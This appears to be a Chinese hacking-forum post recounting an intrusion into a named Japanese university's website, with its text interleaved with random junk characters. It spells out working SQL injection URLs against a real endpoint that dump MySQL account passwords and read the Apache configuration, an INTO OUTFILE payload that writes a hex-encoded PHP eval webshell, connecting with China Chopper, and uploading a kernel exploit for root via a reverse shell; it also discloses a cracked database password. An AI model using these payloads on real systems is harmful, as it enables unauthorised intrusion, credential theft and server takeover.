入侵日本同志社大学

admin

入侵日本同志社大学技术分析
2 x5 c$ [  p2 U3 |9 f4 z5 W
1 B4 h; G& R6 p; s2 Y8 [9 T  C3 Ahttp://www.doshisha.ac.jp/chs/news/index.php?i=-1
1 n% b- b5 [: I3 J% W4 b2 [然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
7 M7 G' e$ p6 U! ?# x1 f
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user

% o! c) l% r$ B9 \5 X/ {
! g4 X4 F  W, G+ Y
//@@datadir为数据库文件路径


//load_file读取网站容器apache的配置文件


. N5 a' o" H6 a( _% Z! v5 Y//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
5 B! j7 O& N+ o复制代码

虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
  n( O$ b% [$ ~) ^2 n- N9 e. m
6 A1 }6 [3 N$ I& G. a7 y# C2 ^而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
3 S' |; e0 N; E! ~1 d% O  k2 @(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)
0 x9 Z5 Y7 m  K
1 \/ w4 U1 C2 T9 a- w! T9 m$ N! n前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html
' C3 w  F5 b3 T/ q( q2 S
既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
5 Y% C( Y+ C# c直接写一句话：

http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
# O8 z4 c, ]4 N% w, [4 k  i% k! b+ v
% N( r. F' `' k1 D
1 z  n. f: S- z% B
//最后的#是为了闭合前面的语句

6 c0 T: F4 }2 b6 p+ K: z! p
) ~! A, ]4 u6 A3 n5 D% L7 [0 Z/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E


为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/


//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句

8 J6 S, ~' _  \
( x, g  \+ ], n0 l( \# P( q//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
9 z8 x" d; E0 V6 X//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
2 y9 ^7 r# q- E复制代码
4 X" A; g9 d1 w
) W! \. h3 D% c& J0 P4 t" ]. g; O. sHEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
通过上述注入语句，我们就得到了一句话木马:
8 l* J8 B! G: b8 |$ z7 x
4 {' ]. o) q$ S: V& B
( @# }% J" O3 g5 q( t, ~3 r
, K: ]7 b( D1 m2 ^! A, S

/ a4 ]* s% o1 V" J  S# ohttp://www.doshisha.ac.jp/english/engnews_img/aa.php
0 V8 h) N- C, t6 Q! n# y; q( Y复制代码
) G& s  D% }  G8 l" `7 v5 Z7 {
用菜刀连接，密码是cmd，如图所示：
) E1 M4 [( Z1 C* M% T* \. b' {% O* {然后在命令提示行里看了一下，现在的权限是：
5 e, J+ q: D9 U: v8 A, S
) x  D' r% o, y: J/ z* a; t3 [( A# e之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
$ M8 e2 V2 _0 P' l( |* w) G1 W好在赋权给这个文件夹不需要root，直接执行赋权语句：
2 q6 V0 ~1 e+ [4 A5 `  c  b& `

+ K7 ?+ R, [# z! T8 a/ _6 _

! m. p) U% R9 F9 k
chmod +x /tmp/
复制代码
1 ^  n2 f& p* f' ]3 K  o: \
在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本：


9 ?5 c$ U7 j7 c; _% t9 Y! l
+ H% S0 N3 ~+ X5 z3 E

uname-a
8 [$ W( X) ]$ j; |) [( R: [
, I. b7 X* f$ v2 ^3 B6 m2 G
//其实lsb_release -a
3 R" _$ h9 l! \1 k, s复制代码
2 w$ p; V1 s4 p. s- V
6 A6 E6 M: u/ i' {& Y. m  L: ^如图所示：
. U" L! W: f2 f, G
# d% [& ?/ a$ l6 e  i' R内核版本：linux mainz1 2.6.28-194.e15
) \" A$ H6 g; e& y- W系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

然后给予执行权限
7 D: R0 `' v5 w6 S, v8 `一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样
. v7 e7 A. }9 c" i0 K( \




chmod +x /tmp/2.6.18-194
8 z8 @7 f" |/ h  Q3 E, L9 w复制代码 然后直接执行！~

总结：
这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root

# ?- l1 X* x' h3 M